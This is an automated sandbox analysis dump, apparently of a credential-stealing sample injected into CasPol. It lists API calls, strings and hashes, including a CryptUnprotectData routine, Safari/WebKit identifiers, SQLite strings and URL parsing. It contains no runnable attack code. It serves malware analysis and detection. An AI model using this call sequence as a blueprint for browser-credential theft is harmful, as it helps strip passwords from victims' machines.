                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2136311172-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1936579350-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                  • String ID: %$(NULL)$+$-x0$0123456789ABCDEF0123456789abcdef$NULL
                                                                                                                                                                                  • API String ID: 643879872-1412151055
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3604893535-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4218492932-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1213725291-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: 8$P$P$at most %d tables in a join$cannot use index: %s
                                                                                                                                                                                  • API String ID: 2221118986-3931078971
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • table %S has no column named %s, xrefs: 00436578
                                                                                                                                                                                  • rows inserted, xrefs: 00436C5F
                                                                                                                                                                                  • %d values for %d columns, xrefs: 004364AA
                                                                                                                                                                                  • table %S has %d columns but %d values were supplied, xrefs: 0043648A
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: %d values for %d columns$rows inserted$table %S has %d columns but %d values were supplied$table %S has no column named %s
                                                                                                                                                                                  • API String ID: 2221118986-2709362559
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: no such column: %s$rows updated
                                                                                                                                                                                  • API String ID: 2221118986-885832449
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                  • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                                                                                                                    • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                    • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                    • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                    • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                    • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                    • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                    • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                    • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                    • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2633007058-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                  • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                  • free.MSVCRT ref: 00407082
                                                                                                                                                                                    • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$memcpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2037443186-0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: >PD$>PD
                                                                                                                                                                                  • API String ID: 0-241360673
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: UUUU$g|@
                                                                                                                                                                                  • API String ID: 0-841461634
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 32abcd04455321b07f66e99fd0bcc8daf237abc4de33049fd76ff7c9198d1abb
                                                                                                                                                                                  • Instruction ID: 7b529b0c1894574a094486b107de62a614b2b8bb623f091bad4def53639f0530
                                                                                                                                                                                  • Opcode Fuzzy Hash: 32abcd04455321b07f66e99fd0bcc8daf237abc4de33049fd76ff7c9198d1abb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C5126B17203054BE308CE28EC503AA7BD3EBC534AF18C63DC541C768AD67EE5164785
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3b3061fac263143bf3d11d038388f116502fba1d2a280c6dd7583d1d6c59509c
                                                                                                                                                                                  • Instruction ID: 3574e4e96b5cae7c2ce7dcf764c1f42f5149340d1e6b4e9c3817a5d878268b27
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b3061fac263143bf3d11d038388f116502fba1d2a280c6dd7583d1d6c59509c
                                                                                                                                                                                  • Instruction Fuzzy Hash: A25119729245F08EE395CB3F8454812BFE2AFCD21234FC2D6D8D86B567D2719822DB94
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 916c56741cc8f6ade01a16149e57abe195bb5378381ef9de74a807da475a2b6d
                                                                                                                                                                                  • Instruction ID: a63f790cb74f6972c31383897434a808543730992f85785b63cb3a81aa66305c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 916c56741cc8f6ade01a16149e57abe195bb5378381ef9de74a807da475a2b6d
                                                                                                                                                                                  • Instruction Fuzzy Hash: D751A26170D7905BD7098B3894506AFFFD1ABDA304F498A6DF4CA9B382C5249A08C79A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 29029382298886ffb5c972b1d452ec7b0888992857c24374549475b705505bbf
                                                                                                                                                                                  • Instruction ID: c0f57332b75f98b7b3b9f2f8260941e7774f0d3fac54c31b43d02fa3067fd927
                                                                                                                                                                                  • Opcode Fuzzy Hash: 29029382298886ffb5c972b1d452ec7b0888992857c24374549475b705505bbf
                                                                                                                                                                                  • Instruction Fuzzy Hash: E351115510DBD29EC3268B7D4490196FFF16E77101708CA8EE4EA47B83D118F6A8DBB2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bf2dd090743e2c6723c98dc34c7731ba56a2aa4091d3d4934fb2d269311e6206
                                                                                                                                                                                  • Instruction ID: 6bf344bc0ac2e9a1038f2722d90c5adff34fed9f267e6e685f57ef4be10f9a8b
                                                                                                                                                                                  • Opcode Fuzzy Hash: bf2dd090743e2c6723c98dc34c7731ba56a2aa4091d3d4934fb2d269311e6206
                                                                                                                                                                                  • Instruction Fuzzy Hash: C20171367207058FD308CFADFCC1966B3B2FBD92127084539DA01C3267EA78E921CA54
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                                                                                                                  • Instruction ID: 1c8cf4990013556009a943ce68bbe5c533817c3d042a03847a5f6a4628de1edc
                                                                                                                                                                                  • Opcode Fuzzy Hash: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA01E8326159308FA389DE3AC80144377E3FFCA32532AC1E5C945AB57DD6316847DB90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                                                                                                                  • Instruction ID: e46ac8c8d649937048925bbc22b10e31c7d260e61c9919193dd0f57e0586c858
                                                                                                                                                                                  • Opcode Fuzzy Hash: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                                                                                                                  • Instruction Fuzzy Hash: 75011E326019208FA38DCE3AC80545377E3FFCA325326C1E8D845AB579D6316802CBD4
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                  • API String ID: 2929817778-1134094380
                                                                                                                                                                                  • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                  • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                  • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                  • API String ID: 2787044678-1921111777
                                                                                                                                                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
